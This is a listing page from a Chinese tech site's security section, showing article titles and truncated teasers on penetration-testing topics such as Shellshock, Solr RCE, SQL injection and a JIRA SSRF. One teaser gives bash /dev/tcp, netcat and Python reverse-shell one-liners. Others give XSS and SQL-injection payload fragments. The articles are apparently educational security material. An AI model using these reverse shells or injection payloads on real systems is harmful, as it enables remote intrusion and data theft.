第 30 页-web服务器安全_网站安全防护教程-PHP中文网

当前位置：首页 > 技术文章 > 运维 > 安全

方向：: 全部网络3.0 后端开发 web前端数据库运维开发工具 php框架每日编程微信小程序常见问题其他科技 CMS教程 Java 系统教程电脑教程硬件教程手机教程软件教程手游教程

分类：: php研究 windows运维苹果系统 linux运维 Apache nginx CentOS Docker 安全 LVS 流浪汉德比安扎比克斯库伯内特斯 SSH 织物

最热

最新

H3C端口安全技术是什么

在网络日益发达的今天，安全是不得不关注的一个话题。而在企业中威胁交换机端口的行为比较多，例如未经授权的用户主机随意连接到企业的网络中。如员工自己笔记本，可以在不经管理员同意的情况下，拔下某台主机的网线，插在自己带来的笔记本，然后连入到企业的网络中，这会带来很大的安全隐患，很有可能造成机密资料的丢失。再比如说未经采用同意安装集线器HUB等网络设备。有些员工为了增加网络终端的数量，会在未经授权的情况下。将集线器、交换机等设备插入到办公室的网络接口上。如此的话，会导致这个网络接口对应的交换机接口流量增

安全 1179 2023-05-19 12:46:46
基于GRE的IPSec实例分析

IP安全保护GRE

安全 1045 2023-05-19 12:40:06
xss的小测试是怎样进行的

无安全方面的限制，直接使用alert(/xss/);限制条件：只能使用CSS，不允许使用html标签我们知道利用expression可以用来构造XSS，但是只能在IE下面测试，所以下面的测试请在IE6中执行。body{black;xss:alert(/xss/));/*IE6下测试*/}限制条件：对HTML进行了转义，Image标签可用。测试输入的字符会被插入到src地址中，那么可以使用伪协议来绕过。直接输入alert(/xss/);或者你也可以使用事件来绕过，注意闭合语句即可，如下：1&quo

安全 1061 2023-05-19 11:37:06
bash漏洞复现的示例分析

BourneAgainShell（简称BASH）是在GNU/Linux上最流行的SHELL实现，于1980年诞生，经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。Bash，Unixshell的一种。1989年发布第一个正式版本，原先是计划用在GNU操作系统上，但能运行于大多数类Unix系统的操作系统之上，包括Linux与MacOSXv10.4都将它作为默认shell。它也被移植到MicrosoftWindows上的Cygwin与MinGW，或是可以在MS-

安全 1368 2023-05-19 11:13:11
zabbix如何监控traceroute数据

1.zabbixserver和proxy安装mtrmtr脚本放置到zabbixserver和proxy如下路径：执行chownzabbix:zabbixmtrtrace.shzabbix创建mtrtrace模板：5.将主机关联到模板，zabbix中观察数据：【monitoring】-【latestdata】:

安全 1036 2023-05-19 11:10:12
Apache Solr velocity模板注入RCE漏洞的示例分析

0x01简介Solr是一个独立的企业级搜索应用服务器，它对外提供类似于Web-service的API接口。用户可以通过http请求，向搜索引擎服务器提交一定格式的XML文件，生成索引；也可以通过HttpGet操作提出查找请求，并得到XML格式的返回结果。0x02漏洞介绍Solr中存在VelocityResponseWriter组件,攻击者可以构造特定请求修改相关配置,使VelocityResponseWriter组件允许加载指定模板,进而导致Velocity模版注入远程命令执行漏洞，攻击者利用该

安全 1151 2023-05-19 10:37:13
利用JIRA漏洞访问美军非保密因特网协议路由器网的示例分析

下面讲述了作者在参与美国国防部（DoD）HackthePentagon漏洞众测项目中，利用JIRA漏洞CVE-2017-9506构造了SSRF攻击面，实现了对美军非保密因特网协议路由器网（NIPRnet）的访问，并且结合其它漏洞技巧，获取到DoD内网系统的一系列敏感信息。由于测试过程和内容的涉密性，该篇文章仅点到为止，未对过多技术细节和详细场景作出披露，仅当学习分享，还望读者多多包涵。JIRA是澳大利亚Atlassian公司开发的一款优秀的问题跟踪管理软件工具，可以对各种类型的问题进行跟踪管理，

安全 1143 2023-05-18 22:29:09
SQL注入类型有哪些

前言SQL注入的攻击方式根据应用程序处理数据库返回内容的不同，可以分为可显注入、报错注入和盲注。可显注入攻击者可以直接在当前界面内容中获取想要获得的内容。报错注入数据库查询返回结果并没有在页面中显示，但是应用程序将数据库报错信息打印到了页面中，所以攻击者可以构造数据库报错语句，从报错信息中获取想要获得的内容。盲注数据库查询结果无法从直观页面中获取，攻击者通过使用数据库逻辑或使数据库库执行延时等方法获取想要获得的内容。Mysql手工注入lian合注入?id=1'orderby4--

安全 2152 2023-05-18 22:05:12
反弹shell有哪些

1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.

安全 2213 2023-05-18 22:01:04
NSA新型APT框架DarkPulsar怎么用

前言2017年3月，ShadowBrokers放出了一份震惊世界的机密文档，其中包括两个框架：DanderSpritz和FuzzBunch。DanderSpritz完全由插件组成，用于收集情报、利用漏洞和操控已接管的设备。它基于Java编写，提供类似于僵尸网络管理面板的图形界面以及类似Metasploit工具的控制面板。它还整合了用于非FuzzBunch受控设备的后门和插件。DanderSprit界面概述Fuzzbunch为不同的实用程序提供了一个用于交互和协同工作的框架，包含各种类型的插件，其

安全 1354 2023-05-18 20:14:58
如何进行Ghostscript SAFER沙箱绕过漏洞的分析

前言Ghostscript是一款AdobePostScript语言的解释器软件。可对PostScript语言进行绘图，支持PS与PDF互相转换。目前大多数Linux发行版中都默认安装，并移植到了Unix、MacOS、Windows等平台，且Ghostscript还被ImagineMagic、PythonPIL和各种PDF阅读器等程序所使用。漏洞描述8月21日，Google安全研究员TavisOrmandy披露了多个GhostScript的漏洞，通过在图片中构造恶意PostScript脚本，可以绕

安全 1603 2023-05-18 19:10:39
DDCTF2019两个逆向分别是什么

01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的，直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"

安全 1507 2023-05-18 17:13:20
绕过限制访问到Google内部管理系统的示例分析

蛛丝马迹某天，在挖掘谷歌漏洞的过程中，我从公开的漏洞中发现了一些谷歌自身服务的IP地址，一开始，我真不知道这些IP地址能干嘛。我就先检查了一遍这些IP地址，进一步发现其中包含了一些谷歌的内部IP。我突然想起来，最近，我的朋友KLSREERAM上报过一个谷歌内部IP相关的漏洞，另一个朋友Vishnu则上报过了一个利用谷歌子域名访问到控制面板的漏洞。目前，这两个漏洞都已被谷歌修复，这两个漏洞相关的内部IP地址也不能从互联网上访问到。但是，现在，在我面前就有几个谷歌内部IP地址，我得想办法来看看能不能

安全 1143 2023-05-18 15:19:49
如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析

一、漏洞简介DiskPulseEneterprise是一款监视磁盘变化的软件，它可以通过一个管理端口9120或者web管理窗口80对软件进行连接管理，从而监视磁盘的变化情况。在DiskPulseEneterprise中有一个动态链接库libspp.dll，其中有一些负责HTTP操作的函数，问题就出现在这个动态链接库中，在处理后数据时，由于对于后数据没有进行严格的长度控制，导致在执行获取后数据时向无效内存拷贝数据造成缓冲区溢出，触发SEH异常行为处理，最后控制EIP，执行任意代码。软件下载链接：h

安全 1141 2023-05-18 15:04:07
APP崩溃的主要原因是什么

一、什么样的场景下容易出现崩溃类问题最近脑子里一直在想什么样的问题容易导致崩溃——那就是具有异常思维，举个例子：正好前两天看了一部美剧叫《菜鸟老警》，里面有个场景是主人公JohnNolan因为没有用警车拦住逃犯的车而导致逃犯出逃，这个场景与测试有什么关联呢？首先正常人在马路上行驶都会躲避避免与别人发生碰撞，这就好比测试功能的主流程，不会去乱点乱输入；但是警察就不一样了，他会为了抓住逃犯不顾一切，想尽一切办法，这就好比测试过程中的异常思维，要思考怎么样操作使功能不好用。宝典一、异常操作各种异常操作

安全 2525 2023-05-18 13:55:06